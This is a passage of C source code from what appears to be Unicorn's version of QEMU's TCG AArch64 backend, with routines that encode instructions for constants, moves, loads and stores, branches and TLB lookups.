0x1f)); } static void tcg_out_insn_3313(TCGContext *s, AArch64Insn insn, TCGReg rd, TCGReg rn, uintptr_t scaled_uimm) { /* Note the AArch64Insn constants above are for C3.3.12. Adjust. */ tcg_out32(s, insn | I3312_TO_I3313 | scaled_uimm << 10 | rn << 5 | (rd & 0x1f)); } /* Register to register move using ORR (shifted register with no shift). */ static void tcg_out_movr(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rm) { tcg_out_insn(s, 3510, ORR, ext, rd, TCG_REG_XZR, rm); } /* Register to register move using ADDI (move to/from SP). */ static void tcg_out_movr_sp(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn) { tcg_out_insn(s, 3401, ADDI, ext, rd, rn, 0); } /* This function is used for the Logical (immediate) instruction group. The value of LIMM must satisfy IS_LIMM. See the comment above about only supporting simplified logical immediates. 
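E.g. 0x0000fff0 (a single run of ones) is accepted, while a replicated pattern such as 0x00ff00ff is rejected even though the hardware could encode it.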
*/ static void tcg_out_logicali(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn, uint64_t limm) { unsigned h, l, r, c; // Unicorn Hack (wtdcode): // I have no clue about this assert and it seems the logic here is same with QEMU at least 7.2.1 // That said, qemu probably suffers the same issue but maybe no one emulates mips on M1? // Disabling this still passes all unit tests so let's go with it. // tcg_debug_assert(is_limm(limm)); h = clz64(limm); l = ctz64(limm); if (l == 0) { r = 0; /* form 0....01....1 */ c = ctz64(~limm) - 1; if (h == 0) { r = clz64(~limm); /* form 1..10..01..1 */ c += r; } } else { r = 64 - l; /* form 1....10....0 or 0..01..10..0 */ c = r - h - 1; } if (ext == TCG_TYPE_I32) { r &= 31; c &= 31; } tcg_out_insn_3404(s, insn, ext, rd, rn, ext, r, c); } static void tcg_out_dupi_vec(TCGContext *s, TCGType type, TCGReg rd, tcg_target_long v64) { bool q = type == TCG_TYPE_V128; int cmode, imm8, i; /* Test all bytes equal first. */ if (v64 == dup_const(MO_8, v64)) { imm8 = (uint8_t)v64; tcg_out_insn(s, 3606, MOVI, q, rd, 0, 0xe, imm8); return; } /* * Test all bytes 0x00 or 0xff second. This can match cases that * might otherwise take 2 or 3 insns for MO_16 or MO_32 below. */ for (i = imm8 = 0; i < 8; i++) { uint8_t byte = v64 >> (i * 8); if (byte == 0xff) { imm8 |= 1 << i; } else if (byte != 0) { goto fail_bytes; } } tcg_out_insn(s, 3606, MOVI, q, rd, 1, 0xe, imm8); return; fail_bytes: /* * Tests for various replications. For each element width, if we * cannot find an expansion there's no point checking a larger * width because we already know by replication it cannot match. */ if (v64 == dup_const(MO_16, v64)) { uint16_t v16 = v64; if (is_shimm16(v16, &cmode, &imm8)) { tcg_out_insn(s, 3606, MOVI, q, rd, 0, cmode, imm8); return; } if (is_shimm16(~v16, &cmode, &imm8)) { tcg_out_insn(s, 3606, MVNI, q, rd, 0, cmode, imm8); return; } /* * Otherwise, all remaining constants can be loaded in two insns: * rd = v16 & 0xff, rd |= v16 & 0xff00. */ tcg_out_insn(s, 3606, MOVI, q, rd, 0, 0x8, v16 & 0xff); tcg_out_insn(s, 3606, ORR, q, rd, 0, 0xa, v16 >> 8); return; } else if (v64 == dup_const(MO_32, v64)) { uint32_t v32 = v64; uint32_t n32 = ~v32; if (is_shimm32(v32, &cmode, &imm8) || is_soimm32(v32, &cmode, &imm8) || is_fimm32(v32, &cmode, &imm8)) { tcg_out_insn(s, 3606, MOVI, q, rd, 0, cmode, imm8); return; } if (is_shimm32(n32, &cmode, &imm8) || is_soimm32(n32, &cmode, &imm8)) { tcg_out_insn(s, 3606, MVNI, q, rd, 0, cmode, imm8); return; } /* * Restrict the set of constants to those we can load with * two instructions. Others we load from the pool. */ i = is_shimm32_pair(v32, &cmode, &imm8); if (i) { tcg_out_insn(s, 3606, MOVI, q, rd, 0, cmode, imm8); tcg_out_insn(s, 3606, ORR, q, rd, 0, i, extract32(v32, i * 4, 8)); return; } i = is_shimm32_pair(n32, &cmode, &imm8); if (i) { tcg_out_insn(s, 3606, MVNI, q, rd, 0, cmode, imm8); tcg_out_insn(s, 3606, BIC, q, rd, 0, i, extract32(n32, i * 4, 8)); return; } } else if (is_fimm64(v64, &cmode, &imm8)) { tcg_out_insn(s, 3606, MOVI, q, rd, 1, cmode, imm8); return; } /* * As a last resort, load from the constant pool. Sadly there * is no LD1R (literal), so store the full 16-byte vector. 
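* For V64, a single copy of the value is pooled and loaded with the 64-bit LDR (literal) form instead.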
*/ if (type == TCG_TYPE_V128) { new_pool_l2(s, R_AARCH64_CONDBR19, s->code_ptr, 0, v64, v64); tcg_out_insn(s, 3305, LDR_v128, 0, rd); } else { new_pool_label(s, v64, R_AARCH64_CONDBR19, s->code_ptr, 0); tcg_out_insn(s, 3305, LDR_v64, 0, rd); } } static bool tcg_out_dup_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg rd, TCGReg rs) { int is_q = type - TCG_TYPE_V64; tcg_out_insn(s, 3605, DUP, is_q, rd, rs, 1 << vece, 0); return true; } static bool tcg_out_dupm_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg r, TCGReg base, intptr_t offset) { TCGReg temp = TCG_REG_TMP; if (offset < -0xffffff || offset > 0xffffff) { tcg_out_movi(s, TCG_TYPE_PTR, temp, offset); tcg_out_insn(s, 3502, ADD, 1, temp, temp, base); base = temp; } else { AArch64Insn add_insn = I3401_ADDI; if (offset < 0) { add_insn = I3401_SUBI; offset = -offset; } if (offset & 0xfff000) { tcg_out_insn_3401(s, add_insn, 1, temp, base, offset & 0xfff000); base = temp; } if (offset & 0xfff) { tcg_out_insn_3401(s, add_insn, 1, temp, base, offset & 0xfff); base = temp; } } tcg_out_insn(s, 3303, LD1R, type == TCG_TYPE_V128, r, base, vece); return true; } static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg rd, tcg_target_long value) { tcg_target_long svalue = value; tcg_target_long ivalue = ~value; tcg_target_long t0, t1, t2; int s0, s1; AArch64Insn opc; switch (type) { case TCG_TYPE_I32: case TCG_TYPE_I64: tcg_debug_assert(rd < 32); break; case TCG_TYPE_V64: case TCG_TYPE_V128: tcg_debug_assert(rd >= 32); tcg_out_dupi_vec(s, type, rd, value); return; default: g_assert_not_reached(); } /* For 32-bit values, discard potential garbage in value. For 64-bit values within [2**31, 2**32-1], we can create smaller sequences by interpreting this as a negative 32-bit number, while ensuring that the high 32 bits are cleared by setting SF=0. */ if (type == TCG_TYPE_I32 || (value & ~0xffffffffull) == 0) { svalue = (int32_t)value; value = (uint32_t)value; ivalue = (uint32_t)ivalue; type = TCG_TYPE_I32; } /* Speed things up by handling the common case of small positive and negative values specially. */ if ((value & ~0xffffull) == 0) { tcg_out_insn(s, 3405, MOVZ, type, rd, value, 0); return; } else if ((ivalue & ~0xffffull) == 0) { tcg_out_insn(s, 3405, MOVN, type, rd, ivalue, 0); return; } /* Check for bitfield immediates. For the benefit of 32-bit quantities, use the sign-extended value. That lets us match rotated values such as 0xff0000ff with the same 64-bit logic matching 0xffffffffff0000ff. */ if (is_limm(svalue)) { tcg_out_logicali(s, I3404_ORRI, type, rd, TCG_REG_XZR, svalue); return; } /* Look for host pointer values within 4G of the PC. This happens often when loading pointers to QEMU's own data structures. */ if (type == TCG_TYPE_I64) { tcg_target_long disp = value - (intptr_t)s->code_ptr; if (disp == sextract64(disp, 0, 21)) { tcg_out_insn(s, 3406, ADR, rd, disp); return; } disp = (value >> 12) - ((intptr_t)s->code_ptr >> 12); if (disp == sextract64(disp, 0, 21)) { tcg_out_insn(s, 3406, ADRP, rd, disp); if (value & 0xfff) { tcg_out_insn(s, 3401, ADDI, type, rd, rd, value & 0xfff); } return; } } /* Would it take fewer insns to begin with MOVN? 
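With 32 or more bits set, the inverted value tends to need fewer MOVK fixups, so start from MOVN rather than MOVZ.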
*/ if (ctpop64(value) >= 32) { t0 = ivalue; opc = I3405_MOVN; } else { t0 = value; opc = I3405_MOVZ; } s0 = ctz64(t0) & (63 & -16); t1 = t0 & ~(0xffffUL << s0); s1 = ctz64(t1) & (63 & -16); t2 = t1 & ~(0xffffUL << s1); if (t2 == 0) { tcg_out_insn_3405(s, opc, type, rd, t0 >> s0, s0); if (t1 != 0) { tcg_out_insn(s, 3405, MOVK, type, rd, value >> s1, s1); } return; } /* For more than 2 insns, dump it into the constant pool. */ new_pool_label(s, value, R_AARCH64_CONDBR19, s->code_ptr, 0); tcg_out_insn(s, 3305, LDR, 0, rd); } /* Define something more legible for general use. */ #define tcg_out_ldst_r tcg_out_insn_3310 static void tcg_out_ldst(TCGContext *s, AArch64Insn insn, TCGReg rd, TCGReg rn, intptr_t offset, int lgsize) { /* If the offset is naturally aligned and in range, then we can use the scaled uimm12 encoding */ if (offset >= 0 && !(offset & ((1 << lgsize) - 1))) { uintptr_t scaled_uimm = offset >> lgsize; if (scaled_uimm <= 0xfff) { tcg_out_insn_3313(s, insn, rd, rn, scaled_uimm); return; } } /* Small signed offsets can use the unscaled encoding. */ if (offset >= -256 && offset < 256) { tcg_out_insn_3312(s, insn, rd, rn, offset); return; } /* Worst-case scenario, move offset to temp register, use reg offset. */ tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_TMP, offset); tcg_out_ldst_r(s, insn, rd, rn, TCG_TYPE_I64, TCG_REG_TMP); } static bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg) { if (ret == arg) { return true; } switch (type) { case TCG_TYPE_I32: case TCG_TYPE_I64: if (ret < 32 && arg < 32) { tcg_out_movr(s, type, ret, arg); break; } else if (ret < 32) { tcg_out_insn(s, 3605, UMOV, type, ret, arg, 0, 0); break; } else if (arg < 32) { tcg_out_insn(s, 3605, INS, 0, ret, arg, 4 << type, 0); break; } /* FALLTHRU */ case TCG_TYPE_V64: tcg_debug_assert(ret >= 32 && arg >= 32); tcg_out_insn(s, 3616, ORR, 0, 0, ret, arg, arg); break; case TCG_TYPE_V128: tcg_debug_assert(ret >= 32 && arg >= 32); tcg_out_insn(s, 3616, ORR, 1, 0, ret, arg, arg); break; default: g_assert_not_reached(); } return true; } static void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret, TCGReg base, intptr_t ofs) { AArch64Insn insn; int lgsz; switch (type) { case TCG_TYPE_I32: insn = (ret < 32 ? I3312_LDRW : I3312_LDRVS); lgsz = 2; break; case TCG_TYPE_I64: insn = (ret < 32 ? I3312_LDRX : I3312_LDRVD); lgsz = 3; break; case TCG_TYPE_V64: insn = I3312_LDRVD; lgsz = 3; break; case TCG_TYPE_V128: insn = I3312_LDRVQ; lgsz = 4; break; default: g_assert_not_reached(); } tcg_out_ldst(s, insn, ret, base, ofs, lgsz); } static void tcg_out_st(TCGContext *s, TCGType type, TCGReg src, TCGReg base, intptr_t ofs) { AArch64Insn insn; int lgsz; switch (type) { case TCG_TYPE_I32: insn = (src < 32 ? I3312_STRW : I3312_STRVS); lgsz = 2; break; case TCG_TYPE_I64: insn = (src < 32 ? 
I3312_STRX : I3312_STRVD); lgsz = 3; break; case TCG_TYPE_V64: insn = I3312_STRVD; lgsz = 3; break; case TCG_TYPE_V128: insn = I3312_STRVQ; lgsz = 4; break; default: g_assert_not_reached(); } tcg_out_ldst(s, insn, src, base, ofs, lgsz); } static inline bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs) { if (type <= TCG_TYPE_I64 && val == 0) { tcg_out_st(s, type, TCG_REG_XZR, base, ofs); return true; } return false; } static inline void tcg_out_bfm(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned int a, unsigned int b) { tcg_out_insn(s, 3402, BFM, ext, rd, rn, ext, a, b); } static inline void tcg_out_ubfm(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned int a, unsigned int b) { tcg_out_insn(s, 3402, UBFM, ext, rd, rn, ext, a, b); } static inline void tcg_out_sbfm(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned int a, unsigned int b) { tcg_out_insn(s, 3402, SBFM, ext, rd, rn, ext, a, b); } static inline void tcg_out_extr(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, TCGReg rm, unsigned int a) { tcg_out_insn(s, 3403, EXTR, ext, rd, rn, rm, a); } static inline void tcg_out_shl(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned int m) { int bits = ext ? 64 : 32; int max = bits - 1; tcg_out_ubfm(s, ext, rd, rn, bits - (m & max), max - (m & max)); } static inline void tcg_out_shr(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned int m) { int max = ext ? 63 : 31; tcg_out_ubfm(s, ext, rd, rn, m & max, max); } static inline void tcg_out_sar(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned int m) { int max = ext ? 63 : 31; tcg_out_sbfm(s, ext, rd, rn, m & max, max); } static inline void tcg_out_rotr(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned int m) { int max = ext ? 63 : 31; tcg_out_extr(s, ext, rd, rn, rn, m & max); } static inline void tcg_out_rotl(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned int m) { int bits = ext ? 64 : 32; int max = bits - 1; tcg_out_extr(s, ext, rd, rn, rn, bits - (m & max)); } static inline void tcg_out_dep(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn, unsigned lsb, unsigned width) { unsigned size = ext ? 64 : 32; unsigned a = (size - lsb) & (size - 1); unsigned b = width - 1; tcg_out_bfm(s, ext, rd, rn, a, b); } static void tcg_out_cmp(TCGContext *s, TCGType ext, TCGReg a, tcg_target_long b, bool const_b) { if (const_b) { /* Using CMP or CMN aliases. 
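CMP Xn, #imm is SUBS XZR, Xn, #imm; for negative immediates, CMN Xn, #-imm (ADDS XZR) is used instead.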
*/ if (b >= 0) { tcg_out_insn(s, 3401, SUBSI, ext, TCG_REG_XZR, a, b); } else { tcg_out_insn(s, 3401, ADDSI, ext, TCG_REG_XZR, a, -b); } } else { /* Using CMP alias SUBS wzr, Wn, Wm */ tcg_out_insn(s, 3502, SUBS, ext, TCG_REG_XZR, a, b); } } static inline void tcg_out_goto(TCGContext *s, tcg_insn_unit *target) { ptrdiff_t offset = target - s->code_ptr; tcg_debug_assert(offset == sextract64(offset, 0, 26)); tcg_out_insn(s, 3206, B, offset); } static inline void tcg_out_goto_long(TCGContext *s, tcg_insn_unit *target) { ptrdiff_t offset = target - s->code_ptr; if (offset == sextract64(offset, 0, 26)) { tcg_out_insn(s, 3206, BL, offset); } else { tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_TMP, (intptr_t)target); tcg_out_insn(s, 3207, BR, TCG_REG_TMP); } } static inline void tcg_out_callr(TCGContext *s, TCGReg reg) { tcg_out_insn(s, 3207, BLR, reg); } static inline void tcg_out_call(TCGContext *s, tcg_insn_unit *target) { ptrdiff_t offset = target - s->code_ptr; if (offset == sextract64(offset, 0, 26)) { tcg_out_insn(s, 3206, BL, offset); } else { tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_TMP, (intptr_t)target); tcg_out_callr(s, TCG_REG_TMP); } } void tb_target_set_jmp_target(uintptr_t tc_ptr, uintptr_t jmp_addr, uintptr_t addr) { tcg_insn_unit i1, i2; TCGType rt = TCG_TYPE_I64; TCGReg rd = TCG_REG_TMP; uint64_t pair; ptrdiff_t offset = addr - jmp_addr; if (offset == sextract64(offset, 0, 26)) { i1 = I3206_B | ((offset >> 2) & 0x3ffffff); i2 = NOP; } else { offset = (addr >> 12) - (jmp_addr >> 12); /* patch ADRP */ i1 = I3406_ADRP | (offset & 3) << 29 | (offset & 0x1ffffc) << (5 - 2) | rd; /* patch ADDI */ i2 = I3401_ADDI | rt << 31 | (addr & 0xfff) << 10 | rd << 5 | rd; } pair = (uint64_t)i2 << 32 | i1; atomic_set((uint64_t *)jmp_addr, pair); flush_icache_range(jmp_addr, jmp_addr + 8); } static inline void tcg_out_goto_label(TCGContext *s, TCGLabel *l) { if (!l->has_value) { tcg_out_reloc(s, s->code_ptr, R_AARCH64_JUMP26, l, 0); tcg_out_insn(s, 3206, B, 0); } else { tcg_out_goto(s, l->u.value_ptr); } } static void tcg_out_brcond(TCGContext *s, TCGType ext, TCGCond c, TCGArg a, TCGArg b, bool b_const, TCGLabel *l) { intptr_t offset; bool need_cmp; if (b_const && b == 0 && (c == TCG_COND_EQ || c == TCG_COND_NE)) { need_cmp = false; } else { need_cmp = true; tcg_out_cmp(s, ext, a, b, b_const); } if (!l->has_value) { tcg_out_reloc(s, s->code_ptr, R_AARCH64_CONDBR19, l, 0); offset = tcg_in32(s) >> 5; } else { offset = l->u.value_ptr - s->code_ptr; tcg_debug_assert(offset == sextract64(offset, 0, 19)); } if (need_cmp) { tcg_out_insn(s, 3202, B_C, c, offset); } else if (c == TCG_COND_EQ) { tcg_out_insn(s, 3201, CBZ, ext, a, offset); } else { tcg_out_insn(s, 3201, CBNZ, ext, a, offset); } } static inline void tcg_out_rev64(TCGContext *s, TCGReg rd, TCGReg rn) { tcg_out_insn(s, 3507, REV64, TCG_TYPE_I64, rd, rn); } static inline void tcg_out_rev32(TCGContext *s, TCGReg rd, TCGReg rn) { tcg_out_insn(s, 3507, REV32, TCG_TYPE_I32, rd, rn); } static inline void tcg_out_rev16(TCGContext *s, TCGReg rd, TCGReg rn) { tcg_out_insn(s, 3507, REV16, TCG_TYPE_I32, rd, rn); } static inline void tcg_out_sxt(TCGContext *s, TCGType ext, MemOp s_bits, TCGReg rd, TCGReg rn) { /* Using ALIASes SXTB, SXTH, SXTW, of SBFM Xd, Xn, #0, #7|15|31 */ int bits = (8 << s_bits) - 1; tcg_out_sbfm(s, ext, rd, rn, 0, bits); } static inline void tcg_out_uxt(TCGContext *s, MemOp s_bits, TCGReg rd, TCGReg rn) { /* Using ALIASes UXTB, UXTH of UBFM Wd, Wn, #0, #7|15 */ int bits = (8 << s_bits) - 1; tcg_out_ubfm(s, 0, rd, rn, 0, bits); } static void 
tcg_out_addsubi(TCGContext *s, int ext, TCGReg rd, TCGReg rn, int64_t aimm) { if (aimm >= 0) { tcg_out_insn(s, 3401, ADDI, ext, rd, rn, aimm); } else { tcg_out_insn(s, 3401, SUBI, ext, rd, rn, -aimm); } } static inline void tcg_out_addsub2(TCGContext *s, TCGType ext, TCGReg rl, TCGReg rh, TCGReg al, TCGReg ah, tcg_target_long bl, tcg_target_long bh, bool const_bl, bool const_bh, bool sub) { TCGReg orig_rl = rl; AArch64Insn insn; if (rl == ah || (!const_bh && rl == bh)) { rl = TCG_REG_TMP; } if (const_bl) { insn = I3401_ADDSI; if ((bl < 0) ^ sub) { insn = I3401_SUBSI; bl = -bl; } if (unlikely(al == TCG_REG_XZR)) { /* ??? We want to allow al to be zero for the benefit of negation via subtraction. However, that leaves open the possibility of adding 0+const in the low part, and the immediate add instructions encode XSP not XZR. Don't try anything more elaborate here than loading another zero. */ al = TCG_REG_TMP; tcg_out_movi(s, ext, al, 0); } tcg_out_insn_3401(s, insn, ext, rl, al, bl); } else { tcg_out_insn_3502(s, sub ? I3502_SUBS : I3502_ADDS, ext, rl, al, bl); } insn = I3503_ADC; if (const_bh) { /* Note that the only two constants we support are 0 and -1, and that SBC = rn + ~rm + c, so adc -1 is sbc 0, and vice-versa. */ if ((bh != 0) ^ sub) { insn = I3503_SBC; } bh = TCG_REG_XZR; } else if (sub) { insn = I3503_SBC; } tcg_out_insn_3503(s, insn, ext, rh, ah, bh); tcg_out_mov(s, ext, orig_rl, rl); } static inline void tcg_out_mb(TCGContext *s, TCGArg a0) { static const uint32_t sync[] = { [0 ... TCG_MO_ALL] = DMB_ISH | DMB_LD | DMB_ST, [TCG_MO_ST_ST] = DMB_ISH | DMB_ST, [TCG_MO_LD_LD] = DMB_ISH | DMB_LD, [TCG_MO_LD_ST] = DMB_ISH | DMB_LD, [TCG_MO_LD_ST | TCG_MO_LD_LD] = DMB_ISH | DMB_LD, }; tcg_out32(s, sync[a0 & TCG_MO_ALL]); } static void tcg_out_cltz(TCGContext *s, TCGType ext, TCGReg d, TCGReg a0, TCGArg b, bool const_b, bool is_ctz) { TCGReg a1 = a0; if (is_ctz) { a1 = TCG_REG_TMP; tcg_out_insn(s, 3507, RBIT, ext, a1, a0); } if (const_b && b == (ext ? 
64 : 32)) { tcg_out_insn(s, 3507, CLZ, ext, d, a1); } else { AArch64Insn sel = I3506_CSEL; tcg_out_cmp(s, ext, a0, 0, 1); tcg_out_insn(s, 3507, CLZ, ext, TCG_REG_TMP, a1); if (const_b) { if (b == -1) { b = TCG_REG_XZR; sel = I3506_CSINV; } else if (b == 0) { b = TCG_REG_XZR; } else { tcg_out_movi(s, ext, d, b); b = d; } } tcg_out_insn_3506(s, sel, ext, d, TCG_REG_TMP, b, TCG_COND_NE); } } #ifdef CONFIG_SOFTMMU #include "../tcg-ldst.inc.c" /* helper signature: helper_ret_ld_mmu(CPUState *env, target_ulong addr, * TCGMemOpIdx oi, uintptr_t ra) */ static void * const qemu_ld_helpers[16] = { [MO_UB] = helper_ret_ldub_mmu, [MO_LEUW] = helper_le_lduw_mmu, [MO_LEUL] = helper_le_ldul_mmu, [MO_LEQ] = helper_le_ldq_mmu, [MO_BEUW] = helper_be_lduw_mmu, [MO_BEUL] = helper_be_ldul_mmu, [MO_BEQ] = helper_be_ldq_mmu, }; /* helper signature: helper_ret_st_mmu(CPUState *env, target_ulong addr, * uintxx_t val, TCGMemOpIdx oi, * uintptr_t ra) */ static void * const qemu_st_helpers[16] = { [MO_UB] = helper_ret_stb_mmu, [MO_LEUW] = helper_le_stw_mmu, [MO_LEUL] = helper_le_stl_mmu, [MO_LEQ] = helper_le_stq_mmu, [MO_BEUW] = helper_be_stw_mmu, [MO_BEUL] = helper_be_stl_mmu, [MO_BEQ] = helper_be_stq_mmu, }; static inline void tcg_out_adr(TCGContext *s, TCGReg rd, void *target) { ptrdiff_t offset = tcg_pcrel_diff(s, target); tcg_debug_assert(offset == sextract64(offset, 0, 21)); tcg_out_insn(s, 3406, ADR, rd, offset); } static bool tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) { TCGMemOpIdx oi = lb->oi; MemOp opc = get_memop(oi); MemOp size = opc & MO_SIZE; if (!reloc_pc19(lb->label_ptr[0], s->code_ptr)) { return false; } tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_X0, TCG_AREG0); tcg_out_mov(s, TARGET_LONG_BITS == 64, TCG_REG_X1, lb->addrlo_reg); tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_X2, oi); tcg_out_adr(s, TCG_REG_X3, lb->raddr); tcg_out_call(s, qemu_ld_helpers[opc & (MO_BSWAP | MO_SIZE)]); if (opc & MO_SIGN) { tcg_out_sxt(s, lb->type, size, lb->datalo_reg, TCG_REG_X0); } else { tcg_out_mov(s, size == MO_64, lb->datalo_reg, TCG_REG_X0); } tcg_out_goto(s, lb->raddr); return true; } static bool tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) { TCGMemOpIdx oi = lb->oi; MemOp opc = get_memop(oi); MemOp size = opc & MO_SIZE; if (!reloc_pc19(lb->label_ptr[0], s->code_ptr)) { return false; } tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_X0, TCG_AREG0); tcg_out_mov(s, TARGET_LONG_BITS == 64, TCG_REG_X1, lb->addrlo_reg); tcg_out_mov(s, size == MO_64, TCG_REG_X2, lb->datalo_reg); tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_X3, oi); tcg_out_adr(s, TCG_REG_X4, lb->raddr); tcg_out_call(s, qemu_st_helpers[opc & (MO_BSWAP | MO_SIZE)]); tcg_out_goto(s, lb->raddr); return true; } static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOpIdx oi, TCGType ext, TCGReg data_reg, TCGReg addr_reg, tcg_insn_unit *raddr, tcg_insn_unit *label_ptr) { TCGLabelQemuLdst *label = new_ldst_label(s); label->is_ld = is_ld; label->oi = oi; label->type = ext; label->datalo_reg = data_reg; label->addrlo_reg = addr_reg; label->raddr = raddr; label->label_ptr[0] = label_ptr; } /* We expect to use a 7-bit scaled negative offset from ENV. */ QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) > 0); QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) < -512); /* These offsets are built into the LDP below. 
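The LDP in tcg_out_tlb_read loads {mask, table} as a pair, so they must live at offsets 0 and 8 of CPUTLBDescFast.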
*/ QEMU_BUILD_BUG_ON(offsetof(CPUTLBDescFast, mask) != 0); QEMU_BUILD_BUG_ON(offsetof(CPUTLBDescFast, table) != 8); /* Load and compare a TLB entry, emitting the conditional jump to the slow path for the failure case, which will be patched later when finalizing the slow path. Generated code returns the host addend in X1, clobbers X0,X2,X3,TMP. */ static void tcg_out_tlb_read(TCGContext *s, TCGReg addr_reg, MemOp opc, tcg_insn_unit **label_ptr, int mem_index, bool is_read) { #ifdef TARGET_ARM struct uc_struct *uc = s->uc; #endif unsigned a_bits = get_alignment_bits(opc); unsigned s_bits = opc & MO_SIZE; unsigned a_mask = (1u << a_bits) - 1; unsigned s_mask = (1u << s_bits) - 1; TCGReg x3; TCGType mask_type; uint64_t compare_mask; mask_type = (TARGET_PAGE_BITS + CPU_TLB_DYN_MAX_BITS > 32 ? TCG_TYPE_I64 : TCG_TYPE_I32); /* Load env_tlb(env)->f[mmu_idx].{mask,table} into {x0,x1}. */ tcg_out_insn(s, 3314, LDP, TCG_REG_X0, TCG_REG_X1, TCG_AREG0, TLB_MASK_TABLE_OFS(mem_index), 1, 0); /* Extract the TLB index from the address into X0. */ tcg_out_insn(s, 3502S, AND_LSR, mask_type == TCG_TYPE_I64, TCG_REG_X0, TCG_REG_X0, addr_reg, TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); /* Add the tlb_table pointer, creating the CPUTLBEntry address into X1. */ tcg_out_insn(s, 3502, ADD, 1, TCG_REG_X1, TCG_REG_X1, TCG_REG_X0); /* Load the tlb comparator into X0, and the fast path addend into X1. */ tcg_out_ld(s, TCG_TYPE_TL, TCG_REG_X0, TCG_REG_X1, is_read ? offsetof(CPUTLBEntry, addr_read) : offsetof(CPUTLBEntry, addr_write)); tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_X1, TCG_REG_X1, offsetof(CPUTLBEntry, addend)); /* For aligned accesses, we check the first byte and include the alignment bits within the address. For unaligned access, we check that we don't cross pages using the address of the last byte of the access. */ if (a_bits >= s_bits) { x3 = addr_reg; } else { tcg_out_insn(s, 3401, ADDI, TARGET_LONG_BITS == 64, TCG_REG_X3, addr_reg, s_mask - a_mask); x3 = TCG_REG_X3; } compare_mask = (uint64_t)TARGET_PAGE_MASK | a_mask; /* Store the page mask part of the address into X3. */ tcg_out_logicali(s, I3404_ANDI, TARGET_LONG_BITS == 64, TCG_REG_X3, x3, compare_mask); /* Perform the address comparison. */ tcg_out_cmp(s, TARGET_LONG_BITS == 64, TCG_REG_X0, TCG_REG_X3, 0); /* If not equal, we jump to the slow path. */ *label_ptr = s->code_ptr; tcg_out_insn(s, 3202, B_C, TCG_COND_NE, 0); } #endif /* CONFIG_SOFTMMU */ static void tcg_out_qemu_ld_direct(TCGContext *s, MemOp memop, TCGType ext, TCGReg data_r, TCGReg addr_r, TCGType otype, TCGReg off_r) { const MemOp bswap = memop & MO_BSWAP; switch (memop & MO_SSIZE) { case MO_UB: tcg_out_ldst_r(s, I3312_LDRB, data_r, addr_r, otype, off_r); break; case MO_SB: tcg_out_ldst_r(s, ext ? I3312_LDRSBX : I3312_LDRSBW, data_r, addr_r, otype, off_r); break; case MO_UW: tcg_out_ldst_r(s, I3312_LDRH, data_r, addr_r, otype, off_r); if (bswap) { tcg_out_rev16(s, data_r, data_r); } break; case MO_SW: if (bswap) { tcg_out_ldst_r(s, I3312_LDRH, data_r, addr_r, otype, off_r); tcg_out_rev16(s, data_r, data_r); tcg_out_sxt(s, ext, MO_16, data_r, data_r); } else { tcg_out_ldst_r(s, (ext ? 
I3312_LDRSHX : I3312_LDRSHW), data_r, addr_r, otype, off_r); } break; case MO_UL: tcg_out_ldst_r(s, I3312_LDRW, data_r, addr_r, otype, off_r); if (bswap) { tcg_out_rev32(s, data_r, data_r); } break; case MO_SL: if (bswap) { tcg_out_ldst_r(s, I3312_LDRW, data_r, addr_r, otype, off_r); tcg_out_rev32(s, data_r, data_r); tcg_out_sxt(s, TCG_TYPE_I64, MO_32, data_r, data_r); } else { tcg_out_ldst_r(s, I3312_LDRSWX, data_r, addr_r, otype, off_r); } break; case MO_Q: tcg_out_ldst_r(s, I3312_LDRX, data_r, addr_r, otype, off_r); if (bswap) { tcg_out_rev64(s, data_r, data_r); } break; default: tcg_abort(); } } static void tcg_out_qemu_st_direct(TCGContext *s, MemOp memop, TCGReg data_r, TCGReg addr_r, TCGType otype, TCGReg off_r) { const MemOp bswap = memop & MO_BSWAP; switch (memop & MO_SIZE) { case MO_8: tcg_out_ldst_r(s, I3312_STRB, data_r, addr_r, otype, off_r); break; case MO_16: if (bswap && data_r != TCG_REG_XZR) { tcg_out_rev16(s, TCG_REG_TMP, data_r); data_r = TCG_REG_TMP; } tcg_out_ldst_r(s, I3312_STRH, data_r, addr_r, otype, off_r); break; case MO_32: if (bswap && data_r != TCG_REG_XZR) { tcg_out_rev32(s, TCG_REG_TMP, data_r); data_r = TCG_REG_TMP; } tcg_out_ldst_r(s, I3312_STRW, data_r, addr_r, otype, off_r); break; case MO_64: if (bswap && data_r != TCG_REG_XZR) { tcg_out_rev64(s, TCG_REG_TMP, data_r); data_r = TCG_REG_TMP; } tcg_out_ldst_r(s, I3312_STRX, data_r, addr_r, otype, off_r); break; default: tcg_abort(); } } static void tcg_out_qemu_ld(TCGContext *s, 